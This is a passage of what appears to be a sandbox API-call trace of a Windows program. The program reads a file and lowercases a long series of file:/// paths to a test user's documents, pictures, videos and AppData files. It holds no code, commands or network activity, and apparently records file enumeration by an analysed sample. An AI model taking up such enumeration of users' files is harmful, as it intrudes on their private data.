lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/kqayysruimuhur.gif") returned 72 [0085.823] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.823] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.823] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.823] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Pictures/MO6xTTvZ/Z2LyObAsS%20shWl/XCrdCV/ImjMUnevaLJ.bmp" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/xcrdcv/imjmunevalj.bmp") returned="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/xcrdcv/imjmunevalj.bmp" [0085.823] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/xcrdcv/imjmunevalj.bmp") returned 93 [0085.823] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.823] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.824] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.824] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/AppData/Roaming/bQiP4GzdRig20X.png" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/bqip4gzdrig20x.png") returned="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/bqip4gzdrig20x.png" [0085.824] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/bqip4gzdrig20x.png") returned 70 [0085.824] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.824] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.824] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.824] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Desktop/GvvpRgS0C.png" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/gvvprgs0c.png") returned="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/gvvprgs0c.png" [0085.824] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/gvvprgs0c.png") returned 57 [0085.824] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.824] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.824] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.824] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Videos/zQr7eXBiOKJx.mkv" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/videos/zqr7exbiokjx.mkv") returned="file:///c:/users/bgc6u8oy%20yxgxkr/videos/zqr7exbiokjx.mkv" [0085.824] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/videos/zqr7exbiokjx.mkv") returned 59 [0085.825] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.825] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.825] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.825] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Desktop/VWKCvzfj9FEO9nNP/MIK5.xlsx" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/mik5.xlsx") returned="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/mik5.xlsx" [0085.825] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/mik5.xlsx") returned 70 [0085.825] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.825] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.825] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.825] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/lo28gAEmu_vvRwSD70/I4z-zBSF9hnTkBaKIP/RNVH3h9CK0e39pnQ.pdf" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/rnvh3h9ck0e39pnq.pdf") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/rnvh3h9ck0e39pnq.pdf" [0085.825] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/rnvh3h9ck0e39pnq.pdf") returned 104 [0085.825] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.825] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.825] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.825] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/olV5jdB-fFDIfmWqcS.docx" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/olv5jdb-ffdifmwqcs.docx") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/olv5jdb-ffdifmwqcs.docx" [0085.825] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/olv5jdb-ffdifmwqcs.docx") returned 69 [0085.825] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.825] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.825] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.826] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Desktop/VWKCvzfj9FEO9nNP/KpUzFgCFS9U.swf" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/kpuzfgcfs9u.swf") returned="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/kpuzfgcfs9u.swf" [0085.826] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/kpuzfgcfs9u.swf") returned 76 [0085.826] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.826] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.826] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.826] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Desktop/VWKCvzfj9FEO9nNP/7ULx.jpg" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/7ulx.jpg") returned="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/7ulx.jpg" [0085.826] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/7ulx.jpg") returned 69 [0085.826] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.826] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.826] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.826] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Pictures/v8zjPd1uV_.bmp" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/v8zjpd1uv_.bmp") returned="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/v8zjpd1uv_.bmp" [0085.826] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/v8zjpd1uv_.bmp") returned 59 [0085.826] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.826] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.826] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.826] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Desktop/kfCaijYE4JotJFgCVvZ.docx" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/kfcaijye4jotjfgcvvz.docx") returned="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/kfcaijye4jotjfgcvvz.docx" [0085.826] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/kfcaijye4jotjfgcvvz.docx") returned 68 [0085.826] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.827] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.827] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.827] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Desktop/VWKCvzfj9FEO9nNP/MeiVQH73.jpg" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/meivqh73.jpg") returned="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/meivqh73.jpg" [0085.827] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/meivqh73.jpg") returned 73 [0085.827] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.827] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.827] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.827] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Videos/bGq5Sdc_j4Q1pN3G.mkv" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/videos/bgq5sdc_j4q1pn3g.mkv") returned="file:///c:/users/bgc6u8oy%20yxgxkr/videos/bgq5sdc_j4q1pn3g.mkv" [0085.827] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/videos/bgq5sdc_j4q1pn3g.mkv") returned 63 [0085.827] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.827] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.827] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.827] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/lo28gAEmu_vvRwSD70/I4z-zBSF9hnTkBaKIP/yCPZmKiRBkZdD83zh.pps" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/ycpzmkirbkzdd83zh.pps") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/ycpzmkirbkzdd83zh.pps" [0085.827] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/ycpzmkirbkzdd83zh.pps") returned 105 [0085.827] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.827] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.827] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.827] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/AppData/Roaming/UprRnKOCaJ.swf" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/uprrnkocaj.swf") returned="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/uprrnkocaj.swf" [0085.827] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/uprrnkocaj.swf") returned 66 [0085.828] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.828] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.828] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.828] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/9zD4.pptx" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/9zd4.pptx") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/9zd4.pptx" [0085.828] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/9zd4.pptx") returned 55 [0085.828] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.828] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.828] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.828] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/AppData/Roaming/XAD6daCXJlfSNkrL.mkv" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/xad6dacxjlfsnkrl.mkv") returned="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/xad6dacxjlfsnkrl.mkv" [0085.828] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/xad6dacxjlfsnkrl.mkv") returned 72 [0085.828] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.828] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.828] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.828] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/AppData/Roaming/kEqRajwWgkVsR.bmp" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/keqrajwwgkvsr.bmp") returned="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/keqrajwwgkvsr.bmp" [0085.828] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/keqrajwwgkvsr.bmp") returned 69 [0085.828] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.828] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.828] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.828] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Videos/E1-SZDw/cTHtM1sTuuxWdzGs.swf" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/cthtm1stuuxwdzgs.swf") returned="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/cthtm1stuuxwdzgs.swf" [0085.829] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/cthtm1stuuxwdzgs.swf") returned 71 [0085.829] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.829] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.829] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.829] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Desktop/IE86ieIkRrj2TcTdtHLN.flv" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/ie86ieikrrj2tctdthln.flv") returned="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/ie86ieikrrj2tctdthln.flv" [0085.829] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/ie86ieikrrj2tctdthln.flv") returned 68 [0085.829] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.829] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.829] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.829] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Videos/s%201xjKS5rgwiOStRv.flv" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/videos/s%201xjks5rgwiostrv.flv") returned="file:///c:/users/bgc6u8oy%20yxgxkr/videos/s%201xjks5rgwiostrv.flv" [0085.829] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/videos/s%201xjks5rgwiostrv.flv") returned 66 [0085.829] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.829] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.829] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.829] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/AppData/Roaming/I-vzXXaq.ppt" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/i-vzxxaq.ppt") returned="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/i-vzxxaq.ppt" [0085.829] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/i-vzxxaq.ppt") returned 64 [0085.829] 